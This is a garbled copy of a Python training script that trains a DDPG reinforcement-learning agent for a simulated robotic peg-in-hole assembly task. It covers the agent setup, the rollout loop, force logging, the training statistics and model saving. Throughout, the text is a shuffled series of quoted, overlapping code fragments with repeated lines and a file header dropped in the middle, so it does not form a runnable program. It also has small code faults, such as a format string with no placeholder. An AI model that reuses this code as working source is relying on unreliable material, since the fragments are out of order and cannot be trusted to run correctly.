0. 
for", "as np import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\")", "import sys from baselines import logger from simulation_ddpg import DDPG from util import", "baselines import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max,", "1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs,", "= agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\",", "Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import", "# # if pull_safe is False: # logger.info('Pull up the pegs failed for", "U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory,", "= 0. Number_episodes = 0. 
for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action,", "sys from baselines import logger from simulation_ddpg import DDPG from util import mpi_mean,", "nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force", "gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # #", "is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r", "agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\",", "logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward", "as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb')", "if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance =", "agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses),", "critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver", "agent.reset() # episode_step = 0 # episodes = 0 # t = 0", "= 
mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\"", "agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0", "combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute", "expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6]))))", "# nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular()", "assembly failed for the exceed force!!!') # pull_done = False # while pull_done", "= agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries", "for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. 
compute the mean of", "combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std']", "render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart,", "0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for", "# while pull_done is False and info: # pull_done, pull_safe = env.step_up() #", "= deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory", "False forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in", "import MPI import numpy as np import pandas as pd \"\"\"First the path", "from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util", "with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'):", "env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info,", "/ delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset()", "# if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!')", "failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for", "restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent", "= gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot 
the force and", "logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False # while", "nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = []", "agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log", "the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards)", "is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time()", "the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward)", "re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in", "<filename>baselines/ddpg/src/simulation/Simulate_training.py<gh_stars>10-100 # -*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description :", "str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta =", "# if pull_safe is False: # logger.info('Pull up the pegs failed for the", "pull_done, pull_safe = env.pull_up() #True env # # if pull_safe is False: #", "sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) #", "mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py", "q 
\"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action,", "done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False #", "# # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed", "False: # logger.info('Pull up the pegs failed for the exceed force!!!') # exit()", "not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\",", "t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest", "mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\"", "\"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale,", "= 0. episode_discount_reward = 0. q_value = 0. done = False forcement =", "-0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data'", "0. episode_discount_reward = 0. q_value = 0. 
done = False forcement = []", "Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 -------------------------------------------------", "for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward =", "for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward", "index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf =", "0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles -", "done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done", "re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',',", "'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'),", "if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6])", "single worker\"\"\" # if rank == 0: # saver = tf.train.Saver() # else:", "failed for the exceed force!!!') # exit() break \"\"\"Episode failed and start pull", "= False # while pull_done is False and info: # pull_done, pull_safe =", "deque import pickle import sys from baselines import logger from simulation_ddpg import DDPG", "rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as", "# -*- coding: utf-8 -*- import os import time from collections import deque", "learning rate\"\"\" epoch_actor_lr = actor_lr 
/ delay_rate epoch_critic_lr = critic_lr / delay_rate for", "mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory +", "nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes)", "Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle", "== nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) #", "util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as", "agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats()", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6])", "result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False,", "critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:')", "new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r", "sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and", "agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, 
tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise,", "epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in", "r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\"", "= actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles):", "the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps']", "model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement", "False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up()", "logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if", "-*- import os import time from collections import deque import pickle import sys", "0: # saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history", "mpi4py import MPI import numpy as np import pandas as pd \"\"\"First the", "delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward", "moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if", "and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\",", "logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'):", "1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] 
epoch_adaptive_distances", "import time from collections import deque import pickle import sys from baselines import", "for the exceed force!!!') # pull_done = False # while pull_done is False", "force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r", "done and start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly", "param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward =", "MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2,", "cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action)", "epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10", "step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed", "stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for", "cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0.", "\"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards =", "# re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory", "= time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward =", "- 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times", "Number_episodes = 0. 
for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q =", "exit() break \"\"\"Episode failed and start pull the pegs step by step\"\"\" if", "= critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs", "= 0. q_value = 0. done = False forcement = [] Last_average_reward =", "U import tensorflow as tf from mpi4py import MPI import numpy as np", "combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean']", "and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe =", "by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic,", "r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6])", "------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os", "pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs,", "batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with", "pull_done = False # while pull_done is False and info: # pull_done, pull_safe", "import baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI import", "\"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate 
= np.power(10, 1", "= 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result", "# agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot", "and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into", "collections import deque import pickle import sys from baselines import logger from simulation_ddpg", "= '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,", "logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes", "result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes)", "# if rank == 0: # saver = tf.train.Saver() # else: # saver", "re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory +", "env.step_up() # pull_done, pull_safe = env.pull_up() # True env # # if pull_safe", "for cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses =", "forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done)", "a single worker\"\"\" # if rank == 0: # saver = tf.train.Saver() #", "sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, 
nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations,", "delta = r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is", "saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\"", "index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps =", "epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes)", "+ \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r", "agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is", "\"\"\"Show the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses =", "if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes =", "agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0", "failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment')", "sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. 
compute the mean of the total nb_epoch_cycles\"\"\"", "# -*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author", "\"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 -------------------------------------------------", "# exit() break \"\"\"Episode failed and start pull the pegs step by step\"\"\"", "up the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed", "else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes =", "noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance", "{} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory,", "# if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1)", "moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions", "time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = []", "sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 #", "env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. 
done = False", "al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if", "+ 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement =", "with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta')", "epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes", "date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*-", "mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs)", "Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time", "r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum", "for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt", "\"\"\"Rollout statistics. 
compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history']", "logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent =", "episode_reward += r delta = r - Long_term_reward # if memory.nb_entries >= batch_size", "0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling", "- 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout", "DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import", "worker\"\"\" # if rank == 0: # saver = tf.train.Saver() # else: #", "# logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward =", "if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env", "tensorflow as tf from mpi4py import MPI import numpy as np import pandas", "= pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None)", "the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses = []", "the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr", "= MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action =", "= r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not", "the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) #", "= agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout", "actions by {} 
before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor,", "- 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r,", "step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes", "and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning", "+ gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" #", "epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs", "batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result", "if rank == 0: # saver = tf.train.Saver() # else: # saver =", "stuff only for a single worker\"\"\" # if rank == 0: # saver", "epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start", "model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) #", "# exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards =", "be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,", "exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in", "0. 
Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q", "nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action", "epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise", "epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() -", "the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render,", "env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the", "# # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and", "is False and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done,", "[] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward = -", "1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout +", "assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False", "rank 